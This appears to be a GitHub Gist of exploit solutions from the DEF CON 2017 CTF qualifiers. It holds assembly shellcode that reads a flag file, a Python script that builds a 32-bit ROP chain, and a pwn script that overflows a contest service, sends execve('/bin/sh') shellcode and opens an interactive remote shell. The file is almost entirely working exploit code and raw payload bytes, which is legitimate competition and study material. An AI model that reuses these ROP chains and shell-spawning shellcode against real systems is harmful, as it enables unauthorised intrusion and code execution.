Last active
May 1, 2017 13:56
-
-
Save ytn86/22b7be00aef59479f9a1aab2ada7767f to your computer and use it in GitHub Desktop.
DEFCON 2017 Quals
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BITS 64 | |
_start: | |
mov rdi, rax | |
mov rax, 0x3 | |
syscall | |
pop rcx | |
mov rcx, 0x67616c66 | |
push rcx | |
mov rdi, rsp | |
xor rsi, rsi | |
xor rdx, rdx | |
mov rax, 0x2 | |
syscall | |
readflag: | |
mov rdi, rax | |
mov rsi, rbp | |
sub rsi, 0x80 | |
mov rdx, 0x80 | |
xor rax, rax | |
syscall | |
checkflag: | |
mov al, [rsi+0x32] | |
cmp al, 0x64 | |
jge checkflag | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! python3 | |
import sys | |
bss1 = 0x80ecfc4 | |
bss = 0x80ecfc4+140 | |
ptr = 0x80ed02c | |
buf = 0x802d02c | |
int80 = 0x0806fae0 | |
pop_eax = 0x080e558a | |
push_eax = 0x080e789c | |
pop_ebx = 0x080481c9 | |
pop_ecx = 0x080e5ee1 | |
push_ecx = 0x080e403a | |
pop_edx = 0x0806f2fa | |
push_edx = 0x08064828 | |
push_esp = 0x080e192d | |
xchg_eax_edx = 0x080e8e02 | |
xor_eax_eax = 0x080555c0 | |
inc_eax = 0x080e30a3 | |
inc_ebx = 0x080e9b21 | |
inc_ecx = 0x080e794e | |
inc_edx = 0x0805da67 | |
#binsh = b'/bin/sh' | |
flag = b'flag' | |
gablen = 100 | |
def exploit(): | |
# open('flag', 0, 0); | |
payload = b'' | |
payload += pI(pop_ebx) | |
payload += pI(0x080ed0d6) | |
payload += pI(pop_ecx) | |
payload += pI(0xffffffff) | |
payload += pI(inc_ecx) | |
payload += pI(xor_eax_eax) | |
payload += pI(xor_eax_eax) | |
payload += pI(xchg_eax_edx) | |
payload += pI(xor_eax_eax) | |
payload += pI(inc_eax)*(0x5) | |
payload += pI(int80) | |
#payload += pI(bss) | |
# read(3, bss1, 0x0e0e0e0e); | |
payload += pI(pop_ebx) | |
payload += pI(0xffffffff) | |
payload += pI(inc_ebx)*4 | |
payload += pI(pop_ecx) | |
payload += pI(bss1) | |
payload += pI(pop_edx) | |
payload += pI(0x0e0e0e0e) | |
payload += pI(xor_eax_eax) | |
payload += pI(inc_eax)*(0x3) | |
payload += pI(int80) | |
# write(1, bss1, 0x0e0e0e0e); | |
payload += pI(pop_ebx) | |
payload += pI(0xffffffff) | |
payload += pI(inc_ebx)*2 | |
payload += pI(pop_ecx) | |
payload += pI(bss1) | |
payload += pI(xor_eax_eax) | |
payload += pI(inc_eax)*(0x4) | |
payload += pI(int80) | |
payload1 = b'' | |
payload1 += pI(0x31457185) | |
payload1 += b'b'*100 | |
payload1 += payload | |
payload1 += b'./'*50 | |
payload1 += flag | |
payload1 += b'\n' | |
payload1 += b'15\n' | |
payload1 += b'y\n' | |
payload1 += b'20\n' | |
payload1 += b'y\n' | |
payload1 += b'20\n' | |
payload1 += b'y\n' | |
payload1 += b'23\n' | |
payload1 += b'n\n' | |
sys.stdout.buffer.write(payload1) | |
def main(): | |
exploit() | |
if __name__ == '__main__': | |
main() | |
""" | |
The flag is: Thanks to Kenshoto for the inspiration! 5fbb34920c457b2e0855a174b8de3ebc | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! python3 | |
from ctflib import Pwn | |
from ctflib.util import * | |
import sys | |
import time | |
def exploit(cn): | |
paylen = 33 | |
pop_rdi_ret = 0x4014d6 | |
pop_rsi_ret = 0x4015f7 | |
pop_rdx_ret = 0x441e46 | |
main_gets = 0x4009dd | |
bss = 0x6ca000 | |
syscall_ret = 0x466815 | |
sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' | |
payload = b'' | |
payload += b'Smash me outside, how bout dAAAAAAAAAAA' | |
payload += b'b'*(33) | |
payload += pQ(pop_rsi_ret) | |
payload += pQ(bss) | |
payload += pQ(pop_rdi_ret) | |
payload += pQ(0) | |
payload += pQ(pop_rdx_ret) | |
payload += pQ(0x30) | |
payload += pQ(syscall_ret) | |
payload += pQ(bss) | |
payload += b'\n' | |
#input('aaa') | |
cn.send(payload) | |
time.sleep(1) | |
cn.send(sc) | |
cn.interact() | |
def main(): | |
cn = Pwn() | |
#cn.connect('localhost', 57348) | |
cn.connect('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348) | |
exploit(cn) | |
if __name__ == '__main__': | |
main() | |
""" | |
The flag is: You must be at least this tall to play DEF CON CTF | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment